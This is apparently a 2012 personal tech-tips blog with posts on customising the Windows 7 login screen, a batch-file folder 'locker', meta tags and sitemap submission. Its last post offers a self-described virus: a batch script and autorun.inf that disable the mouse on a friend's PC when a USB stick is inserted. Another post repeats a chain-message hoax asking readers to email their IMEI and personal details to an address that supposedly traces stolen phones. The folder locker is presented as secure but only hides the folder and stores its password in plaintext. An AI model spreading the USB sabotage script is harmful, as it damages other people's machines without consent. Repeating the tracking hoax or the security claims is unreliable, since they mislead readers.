Wednesday, 25 January 2012

How to Change Windows7 Login Screen.


Hello Friends, Thanks for watching my first post on How to make folders as CON,AUX,NUL etc. in windows .Keep appreciating like this,it makes me more enthusiastic to share more tricks with you guys.
Today i am going to share a trick on “How to Change Windows7  login screen” . Well commonly we have login screen as below —

   logonscreen_previous






Well if want to customize it,you just have to follow simple steps below–
Go to Start >Run >Type Regedit . i.e open registry editor.
Now Go toHKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONAUTHENTICATIONLogOnUIBackground
Make a DWORD Value with the name OEMBackground and set its value to 1 .

Then,Go to “SystemDrive:WindowsSystem32oobe” .
Create a folder named “info”
In ‘info’ create a folder named as ‘backgrounds”
In ‘backgrounds’ put your desired login-screen file (better be in ‘.jpeg’ format ) with the name‘backgroundDefault’.
One thing you need to keep in mind that size of this file should be less than ’256 kb’ otherwise windows won’t accept it as log-in screen.
Now whole path should be as as C: is System Drive –
“C:WindowsSystem32oobeinfobackgroundsbackgroundDefault.jpeg”
loginscreen_filelocation






Now the login screen changed to below one–
logonscreen_new







If you like this creation then you can share it with your friends. And for support you can ask in comments.

How to Track your lost mobile

Did you ever lost your mobile and found no help from police or mobile operator in tracking your mobile? Well now you don’t need to be worried about it. Now a days each one of us carry Mobile devices and always fear that it may be stolen. Each mobile carries a unique IMEI i.e International Mobile Identity No which can be used to track your mobile anywhere in the world.

This is how it works!!!!!!

1. Dial *#06# from your mobile.
2. Your mobile shows a unique 15 digit .
3. Note down this no anywhere but except your mobile as this is the no which will help trace your mobile in case of a theft.
4. Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net
5. No need to go to police.
6. Your Mobile will be traced within next 24 hrs via a complex system of GPRS and internet.
7. You will find where your hand set is being operated even in case your no is being changed.

PASS ON THIS VERY IMP MESSAGE TO ALL YOUR FRIENDS AND RELATIVES.

If u lost your mobile, send an e-mail to cop@vsnl.net with the following info.

Your name:
Address:
Phone model:
Make:
Last used No.:
E-mail for communication:
Missed date:
IMEI No.:


Share this creation with your all friends, If in future they lost their mobile or you lost your mobile phone then it will be surely helpful.
Thanks for reading, Keep yourself updated here :)

How to lock a Folder without software

We all know about the many folder lock software which are available on huge internet market. But they all are not much successful because of memory management but also if any of your friend just uninstall the soft then your all files will be open or will be currept.
Todays i am going to share a creation which can hide a folder without software.
Now whats new in this.
Ok let read out the features :P

Features

  • Free of Cost
  • Only a simple script it is
  • fast access
  • The special thing is, if you lock a folder with this and make the files hide. Then even DOS will be failed to seach your files ;)
Yeah i know the last feature is much more intersting.
Now how to use this creation.

Steps:

1. Open notepad and paste the following code in it.
2. Change the password in code.

On following ( Type your password here )
Enter your password here.

3. Save the notepad as: Locker.bat
4. At first time start it will create folder with Locker automatically for u.
5. After creation of Locker folder again click on the Locker.bat
6. It will ask.press Y then Locker folder will be disappeared.
7. Again to get it click on locker.bat. and give ur password u will get the folder again.


Code:

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
attrib +h +s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
ren "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
11/19/07
*Vicky verma
See the 13th line from below.
It is as follow

if NOT %pass%==type your password here goto FAIL

Enjoy Friends keep yourself updated for more this type of creations :)


Tuesday, 24 January 2012

Meta Tags Expanded Full Tutorial | SEO

seo services

In my previous (All about Spiders, Crawlers, and Robots) post i have already explained about Spiders, Crawlers and Robots and its uses in seo serivces. Now today i am going to share another important part of SEO. As title of post shows that this post is well labeled about Meta tags. We are going on same path..
So lets start reading about another important part of SEO.

First of all, don't let me mislead you, meta tags are not the "magic bullet" that will skyrocket your site to the top of all search page listings. They are a tool that will help improve your standings in search engines that use them. Use them with other marketing strategies to garner more page views.

Another thing to remember: most search engines look at the body of text on your pages, as well as the page title. They take this information as higher relevance than any meta tags. So, be sure to always have a relevant <TITLE> on your pages, and relevant content in the body of the page. This will improve your rankings more than just meta tags alone.


What is a Meta Tag?


A meta tag is a hidden tag that lives in the <HEAD> of an HTML document. It is used to supply additional information about the HTML document. The meta tag has three possible attributes content,http-equiv, andname. Meta tags always provide information in a name/value pair. The name and http-equivattributes provide the name information and thecontentprovides the value information. Meta tags do not have a closing tag.


content
This attribute will always be found in a well formed meta tag. It provides the value information in the name/value pair. It can be any valid string, which you should enclose in quotes.

name
This is the name portion in the name value pair. You can use any name that you would like or that might be useful to you. Some common names are:


  • keywords - words that identify what the page is about, usually used in search engines

<meta name="keywords" content="HTML, HTML help, meta tags, promotion, web sites">
  • description - a short description of the page
<meta name="description" content="Boost your marketing strategy with meta tags">
  • author - the author's name and possibly email address

<meta name="author" content="Jennifer Kyrnin">

  • robots - to allow or disallow indexing by robots

<meta name="robots" content="noindex">

  • copyright - the copyright date of the page

<meta name="copyright" content="August 1999">

http-equiv
This attribute is also a name for the name/value pair, but it is used by the server to include that name/value pair in the MIME document header passed to the Web browser before sending the actual HTML document. Some common http-equiv types are:



  • charset - defines the character set used in the page
<meta http-equiv="charset" content="iso-8859-1">


  • expires - when the document will be out of date
<meta http-equiv="expires" content="31 Dec 99">


  • refresh - sets the number of seconds to reload the page or reload to a new page
Reload the page every 10 seconds:
<meta http-equiv="refresh" content="10">
Reload to a new page after 10 seconds:
<meta http-equiv="refresh" content="10;url=http://webdesign.about.com/">

How to Use a Meta Tag

Meta tags are included in the <HEAD> of an HTML document. If you are using meta tags to improve your standing in search engines, then you should focus on your description and keywords.

The description tag
Use the description tag to describe what your page is about. Engines that use it will supply the content of this tag when displaying a list of links. For example, if you do a search on About.com, you will see the description listed on the search results page.

The keywords tag
Keywords help search engines to categorize your site, and to allow people to find your pages more quickly. However, most search engines have limits as to how many meta keywords are viewed. It is a good idea to review your keywords and make sure that they are as concise and specific as possible.

Wait for the next part linked with my topic seo services. In my next post i will provide a full tutorial on Sitemap. How to build and how to submit it..

How to create sitemap and how to submit it (Full Tutorial)

In my previous posts related to seo services i have well explained about crawlers, robots, spiders, meta tags etc..
Now today i going to share a must part of SEO which is called sitemap.
One thing that you can do to make your blog indexed fast by search engines such as Google, Yahoo, or Bing is by sending the sitemap address of your blog. Previously, Maybe you have known that sitemap address for blogger only added the code "atom.xml" at the end of your blog address, e.g. Vivek Creations blog has the address as follow:

http://www.vivekcreations.blogspot.com/

so the sitemap address to be registered would be:

http://www.vivekcreations.blogspot.com/atom.xml

If you use the feedburner service and then you redirect the feed address to sitemap address given by feedburner, there will be a notice that the sitemap you have submitted experiences error. The solution to this error is by adding one code ?redirect=false. For example, the sitemap address below runs error:

http://www.blogspottutorial.com/atom.xml

So to remove this error notice from Google webmaster tool, the submitted feed address would be added the code ?redirect=false at the end of fee address, e.g.:

http://www.vivekcreations.blogspot.com/atom.xml?redirect=false

The error message usually will be lost or it has been overcome, but it still leaves a peace of problem especially that in blogger or blogspot.  It is about the pages indexed although there are a lot of posts in it. For example, Vivek Creations blog http://www.vivekcreations.blogspot.com/ has 121 posts, but Google webmaster toolrecords only 20 indexed URLs.

seo services

This question is often asked by many bloggers using BlogSpot machine. Are you one of them? If yes, please try the best way that I am about to give you below.

The best way to overcome the error message in Google Webmaster Tool is by using Blogger Sitemap Generator. With the Blogger Sitemap Generator, we can create a sitemap for our blogs and proven to be able to overcome the no-indexed posts.

seo services

The following are the way to use Blogger Sitemap Generator :


2. Enter your blog address into the empty field available, do not forget to write your complete blog address including the http:// and ends with / (slash) (e.g. http://www.vivekcreations.blogspot.com/ ), and then click the Create Blogger Sitemap button.
seo services


3. Records the sitemap address, copy and paste in notepad or other programs, e.g.:

  • atom.xml?redirect=false&start-index=1&max-results=500
  • atom.xml?redirect=false&start-index=501&max-results=500
seo services

4. Also click the links to submit to Bing and Yahoo.

For those who have more than 500 posts, the sitemap address would be more than one,
For the next step, please login to Google webmaster tool to submit the sitemap you have created. If you don’t have Google account, please register here . Below are the detailed steps:

1. When you are in the dashboard of Google webmaster tool, please find the blog that you want to submit its sitemap.
2. Click Site Configuration

seo services

3. Click Sitemaps
seo services

4. Click Submit a Sitemap button. Copy and paste the sitemap address you have created at blogger sitemap generator (  atom.xml?redirect=false&start-index=1&max-results=500 ), and then click Submit Sitemap. For blog with more than one sitemap ( more than 500 posts ), please repeat this step until all is done.

seo services

5. The submission process of sitemap is done. Usually, it needs time until one day to get this submission sitemap worked and indexed by Google. Please login again the next day to check out whether your sitemap has worked and been indexed or not.

I hope that with this way, your blogs’ sitemaps will be indexed fast by Google, and I hope the search engines will drive more visitors to your blogs.
Keep yourself updated on Vivek Creations for more seo services related posts.

Saturday, 21 January 2012

Disable your Friend’s Mouse By Just Inserting A USB In His/Her PC



Do you wanna Lock your friends mouse by just inserting a  small USB ?
Ok let me teach you how to do this prank, well my this creation is all about some windows coding.
But their is no need to learn about programming languages for that.


To use this trick first you have to create a Batch file in notepad by saving it with the .bat extension.


Copy/Paste the below code in notepad and save it as filename.bat, Here filename could be any name but the extension should be .bat.

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4 



Now you have create a autorun.inf file to run the above batch file automatically by just inserting the USB. Here is the autorun fil. Copy paste is code in the in the new Notepad window. 


[autorun]
Open=filename.bat
Action=Mouse Disable 


Save this file as autorun.inf.



Now you have created a virus that will disable the mouse. Copy both of the file in your or your friend’s USB Drive and have fun...


To re-enable the mouse, simply create another batch file with following script:

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1

Save this file as .bat extension and run this batch file by just double clicking on it.
Enjoy this prank and share it with your friends :D